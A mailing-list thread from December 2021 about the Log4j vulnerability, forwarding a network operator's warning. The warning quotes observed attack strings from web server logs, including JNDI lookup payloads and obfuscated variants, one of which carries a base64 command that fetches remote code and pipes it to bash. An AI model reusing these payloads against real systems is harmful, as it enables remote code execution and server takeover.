Re: [Bloat] Fwd: Log4j mitigation

[David Lang]

Just a note that this doesn't require the code to be written in Java, any 
language that runs in a jvm can end up having grief.

David Lang
On Mon, 13 Dec 2021, Dave Taht wrote:

Date: Mon, 13 Dec 2021 05:56:36 -0800
From: Dave Taht <dave.t...@gmail.com>
To: bloat <bloat@lists.bufferbloat.net>
Subject: [Bloat] Fwd: Log4j mitigation

for those of you losing sleep over the java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in java, and I lost 3 weeks of my
life over christmas to spectre, and several weeks per year - and
usually, right around christmas! coping with other CVE's.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <j...@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <j...@ddostest.me>
Cc: <na...@nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL),
in Headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
soon.

We are seeing things like this since 10th of Dec. And this is only a
typical Apache Logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}



--
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC
_______________________________________________
Bloat mailing list
Bloat@lists.bufferbloat.net
https://lists.bufferbloat.net/listinfo/bloat_______________________________________________
Bloat mailing list
Bloat@lists.bufferbloat.net
https://lists.bufferbloat.net/listinfo/bloat